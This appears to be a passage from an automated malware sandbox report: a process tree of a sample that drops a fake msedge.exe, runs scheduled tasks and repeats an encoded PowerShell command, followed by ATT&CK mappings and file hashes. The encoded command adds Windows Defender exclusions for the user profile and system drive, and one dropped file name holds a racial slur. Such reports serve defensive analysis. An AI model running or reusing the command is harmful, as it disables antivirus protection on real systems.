        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        329⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        329⤵
        
        PID:3260
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        329⤵
        
        PID:1008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        330⤵
        
        PID:2904
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        330⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        330⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        331⤵
        
        PID:2896

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2106349200100892836-1004598156266386166-14783171203029526721285426427-1162242393"
1⤵
PID:1992

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-874152196-1240537500909046389-15013926482047607821531579580827905534-292282472"
1⤵
PID:2028

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "137840592415745862531851372989-4602838751975381691-1331335677146017452303018840"
1⤵
PID:2904

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1745218169784276018-10665715241159568369-140413916817670967732012609666-612735860"
1⤵
PID:2948

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "17639356-1532189634-743456514-1390964544-1490321293-1991781179-5222631521940438060"
1⤵
PID:1428

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "274058301205385508318923984108842289922168398661219240217255450075-1126971639"
1⤵
PID:2624

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1790622559-176561342012422708411079303447-166035078-1010156132695068081-1394011734"
1⤵
PID:272

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1114488575-210403177-1448028246-4512139181080799420-371341663-221739940-581725230"
1⤵
PID:1004

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "131852835143034145012536009991696627104-11453618631558255324-25435652-478013391"
1⤵
PID:1480

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "69711001-1430302358-1463940704-914420098-5219979451433044862-14843043841354057481"
1⤵
PID:948

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1346337965-20515331268435004201952773936319745514968354301906798569-890423351"
1⤵
PID:2488

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1142968819-489496926-138748988217480143271245644748251013485-1860321755-997078705"
1⤵
PID:2196

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-444646461-328278726-500859736-752329019-438856697-103553122950370157639330505"
1⤵
PID:1284

C:\Windows\system32\taskeng.exe
taskeng.exe {3152ECAD-76A2-45A6-8FB3-1DCDA8CEBEEA} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
1⤵
PID:1944
- C:\Users\Admin\AppData\Roaming\msedge
  C:\Users\Admin\AppData\Roaming\msedge
  2⤵
  PID:2372

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-128340515-1713119710379884831-911501851309372743354866859-1311445118-850033213"
1⤵
PID:2792

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1904239296471382280-410868965-12431656824580573451149798892-11495857461832290502"
1⤵
PID:1440

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "7611863885375330-407640619-4957811431213328126-179861460-1769956182-559103686"
1⤵
PID:2868

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1104837148804215253178672299739502548616434307561351984167-1186844481-460892010"
1⤵
PID:2420

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-13266666272079547112-969421144699739634-392789011-1083210533-255535629236415691"
1⤵
PID:3904

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2093883168-997400468-577780689355756169-5431028148350002481784323531532450204"
1⤵
PID:3560

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-125279397-14799639607882287231548331205-1552756011-1271643992-383414035370268667"
1⤵
PID:3844

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-823986049-1499543520-820892683-1948067116-2091647984905294841748924202-776768667"
1⤵
PID:2800

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "556507812837866460-572184334191361479012117784912062354585407978467-2063470742"
1⤵
PID:800

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "60809181210259972191631796156-46847778518517032810227552731016504309-1535226554"
1⤵
PID:3516

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1895320646643327732389899029-339913238-1648793499-1328998982-827338951-1072283821"
1⤵
PID:2528

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1939997542-1262383892450254047-2110427845359028828814753133-1492257337-767213330"
1⤵
PID:3932

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1597492866103396429240859346575369793410372518711506239514394919905523469309"
1⤵
PID:3548

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "82704707-545644131-1579612929-372492144111508800121364235591120449955-1324742580"
1⤵
PID:1700

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "11895427421067347093744330025-1902502172007663651650818484-990880897523170605"
1⤵
PID:2096

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\msedge.exe

Filesize
168KB

MD5
c99fa0609ffdeb61fed837c295b57ab8

SHA1
3a9fd8aaff8cbda3a9fd898ede4d0ccf9d860ea0

SHA256
39bed1cc5a12bc23b0c84791fffd86f7a011bb8a7291fddea9a8b8be27702792

SHA512
a2a363c1033524a780489cc1959358249246513043291567d140f5ca5cfad31858fcb6833147e1853ddfc5a82a6da5307e7fd4ad608dec719da3f7781e13bc52

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
e482de2e3e20112a29bbe9db930f8b4f

SHA1
76ad7fdb957660ef7e818d452790c3da23f02bd4

SHA256
0ebd19bbea8474646ca557d88203a7f77bedfa3f54674da33bd891b40ab425c6

SHA512
0d6d07b2c4fe8388da902b587f61df0cff3a7d5de02ba93ba9f5ac90e21ad20abdb88c855981a437196532d38e651db9cf07f8cdec41a78b18888fa2f642008f

Download Submit
memory/1000-2964-0x0000000000100000-0x000000000012E000-memory.dmp

Filesize
184KB

Download
memory/1968-1979-0x0000000000C90000-0x0000000000CBE000-memory.dmp

Filesize
184KB

Download
memory/2300-160-0x00000000030D0000-0x0000000003D1A000-memory.dmp

Filesize
12.3MB

Download
memory/2300-159-0x00000000772B0000-0x00000000773AA000-memory.dmp

Filesize
1000KB

Download
memory/2300-158-0x0000000077190000-0x00000000772AF000-memory.dmp

Filesize
1.1MB

Download
memory/2372-716-0x00000000011D0000-0x00000000011FE000-memory.dmp

Filesize
184KB

Download
memory/2776-11-0x0000000001280000-0x00000000012AE000-memory.dmp

Filesize
184KB

Download
memory/4052-398-0x000000001B6A0000-0x000000001B982000-memory.dmp

Filesize
2.9MB

Download
memory/4052-399-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download